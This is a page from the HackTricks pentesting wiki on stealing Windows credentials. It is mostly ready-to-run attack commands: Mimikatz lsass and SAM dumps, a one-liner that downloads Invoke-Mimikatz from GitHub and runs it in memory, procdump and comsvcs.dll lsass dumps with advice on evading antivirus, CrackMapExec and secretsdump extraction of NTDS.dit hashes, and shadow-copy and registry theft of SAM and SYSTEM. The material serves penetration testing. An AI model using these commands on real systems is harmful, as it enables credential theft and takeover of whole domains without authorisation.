HackTricks
Search…
Pentesting
Powered By GitBook
Stealing Credentials

Credentials Mimikatz

1
#Elevate Privileges to extract the credentials
2
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
3
token::elevate
4
#Extract from lsass (memory)
5
sekurlsa::logonpasswords
6
#Extract from SAM
7
lsadump::sam
8
#One liner
9
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
Copied!
Find other things that Mimikatz can do in this page.

Invoke-Mimikatz

1
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
2
Invoke-Mimikatz -DumpCreds #Dump creds from memory
3
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
Copied!
Learn about some possible credentials protections here. This protections could prevent Mimikatz from extracting some credentials.

Credentials with Meterpreter

Use the Credentials Plugin that I have created to search for passwords and hashes inside the victim.
1
#Credentials from SAM
2
post/windows/gather/smart_hashdump
3
hashdump
4
5
#Using kiwi module
6
load kiwi
7
creds_all
8
kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam"
9
10
#Using Mimikatz module
11
load mimikatz
12
mimikatz_command -f "sekurlsa::logonpasswords"
13
mimikatz_command -f "lsadump::sam"
Copied!

Bypassing AV

Procdump + Mimikatz

As Procdump from SysInternals is a legitimate Microsoft tool, it's not detected by Defender. You can use this tool to dump the lsass process, download the dump and extract the credentials locally from the dump.
Dump lsass
1
#Local
2
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
3
#Remote, mount https://live.sysinternals.com which contains procdump.exe
4
net use Z: https://live.sysinternals.com
5
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
Copied!
Extract credentials from the dump
1
//Load the dump
2
mimikatz # sekurlsa::minidump lsass.dmp
3
//Extract credentials
4
mimikatz # sekurlsa::logonPasswords
Copied!
This process is done automatically with SprayKatz: ./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24
Note: Some AV may detect as malicious the use of procdump.exe to dump lsass.exe, this is because they are detecting the string "procdump.exe" and "lsass.exe". So it is stealthier to pass as an argument the PID of lsass.exe to procdump instead of the name lsass.exe.

Dumping lsass with comsvcs.dll

There’s a DLL called comsvcs.dll, located in C:\Windows\System32 that dumps process memory whenever they crash. This DLL contains a function called MiniDumpW that is written so it can be called with rundll32.exe. The first two arguments are not used, but the third one is split into 3 parts. First part is the process ID that will be dumped, second part is the dump file location, and third part is the word full. There is no other choice. Once these 3 arguments has been parsed, basically this DLL creates the dump file, and dumps the specified process into that dump file. Thanks to this function, we can use comsvcs.dll to dump lsass process instead of uploading procdump and executing it. (This information was extracted from https://en.hackndo.com/remote-lsass-dump-passwords/)
1
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
Copied!
We just have to keep in mind that this technique can only be executed as SYSTEM.
You can automate this process with lssasy.

CrackMapExec

Dump SAM hashes

1
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
Copied!

Dump LSA secrets

1
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
Copied!

Dump the NTDS.dit from target DC

1
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
2
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
Copied!

Dump the NTDS.dit password history from target DC

1
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
Copied!

Show the pwdLastSet attribute for each NTDS.dit account

1
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
Copied!

Stealing SAM & SYSTEM

This files should be located in C:\windows\system32\config\SAM and C:\windows\system32\config\SYSTEM. But you cannot just copy them in a regular way because they protected.

From Registry

The easiest way to steal those files is to get a copy from the registry:
1
reg save HKLM\sam sam
2
reg save HKLM\system system
3
reg save HKLM\security security
Copied!
Download those files to your Kali machine and extract the hashes using:
1
samdump2 SYSTEM SAM
2
impacket-secretsdump -sam sam -security security -system system LOCAL
Copied!

Volume Shadow Copy

You can perform copy of protected files using this service. You need to be Administrator.

Using vssadmin

vssadmin binary is only available in Windows Server versions
1
vssadmin create shadow /for=C:
2
#Copy SAM
3
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SAM
4
#Copy SYSTEM
5
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
6
#Copy ntds.dit
7
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit
8
9
# You can also create a symlink to the shadow copy and access it
10
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
Copied!
But you can do the same from Powershell. This is an example of how to copy the SAM file (the hard drive used is "C:" and its saved to C:\users\Public) but you can use this for copying any protected file:
1
$service=(Get-Service -name VSS)
2
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
3
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
4
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
5
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
6
$voume.Delete();if($notrunning -eq 1){$service.Stop()}
Copied!

Invoke-NinjaCopy

Finally, you could also use the PS script Invoke-NinjaCopy to make a copy of SAM, SYSTEM and ntds.dit.
1
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"
Copied!

Active Directory Credentials - NTDS.dit

The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
The important NTDS.dit file will be located in: %SystemRoom%/NTDS/ntds.dit This file is a database Extensible Storage Engine (ESE) and is "officially" composed by 3 tables:
    Data Table: Contains the information about the objects (users, groups...)
    Link Table: Information about the relations (member of...)
    SD Table: Contains the security descriptors of each object
Windows uses Ntdsa.dll to interact with that file and its used by lsass.exe. Then, part of the NTDS.dit file could be located inside the lsass memory (you can find the lastet accessed data probably because of the performance impruve by using a cache).

Decrypting the hashes inside NTDS.dit

The hash is cyphered 3 times:
    1.
    Decrypt Password Encryption Key (PEK) using the BOOTKEY and RC4.
    2.
    Decrypt tha hash using PEK and RC4.
    3.
    Decrypt the hash using DES.
PEK have the same value in every domain controller, but it is cyphered inside the NTDS.dit file using the BOOTKEY of the SYSTEM file of the domain controller (is different between domain controllers). This is why to get the credentials from the NTDS.dit file you need the files NTDS.dit and SYSTEM (C:\Windows\System32\config\SYSTEM).

Copying NTDS.dit using Ntdsutil

Available since Windows Server 2008.
1
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
Copied!
You could also use the volume shadow copy trick to copy the ntds.dit file. Remember that you will also need a copy of the SYSTEM file (again, dump it from the registry or use the volume shadow copy trick).

Extracting hashes from NTDS.dit

Once you have obtained the files NTDS.dit and SYSTEM you can use tools like secretsdump.py to extract the hashes:
1
secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt
Copied!
You can also extract them automatically using a valid domain admin user:
1
secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
Copied!
For big NTDS.dit files it's recommend to extract it using gosecretsdump.
Finally, you can also use the metasploit module: post/windows/gather/credentials/domain_hashdump or mimikatz lsadump::lsa /inject

Lazagne

Download the binary from here. you can use this binary to extract credentials from several software.
1
lazagne.exe all
Copied!

Other tools for extracting credentials from SAM and LSASS

Windows credentials Editor (WCE)

This tool can be used to extract credentials from the memory. Download it from: http://www.ampliasecurity.com/research/windows-credentials-editor/

fgdump

Extract credentials from the SAM file
1
You can find this binary inside Kali, just do: locate fgdump.exe
2
fgdump.exe
Copied!

PwDump

Extract credentials from the SAM file
1
You can find this binary inside Kali, just do: locate pwdump.exe
2
PwDump.exe -o outpwdump -x 127.0.0.1
3
type outpwdump
Copied!

PwDump7

Download it from: http://www.tarasco.org/security/pwdump_7 and just execute it and the passwords will be extracted.

Defenses

Last modified 8mo ago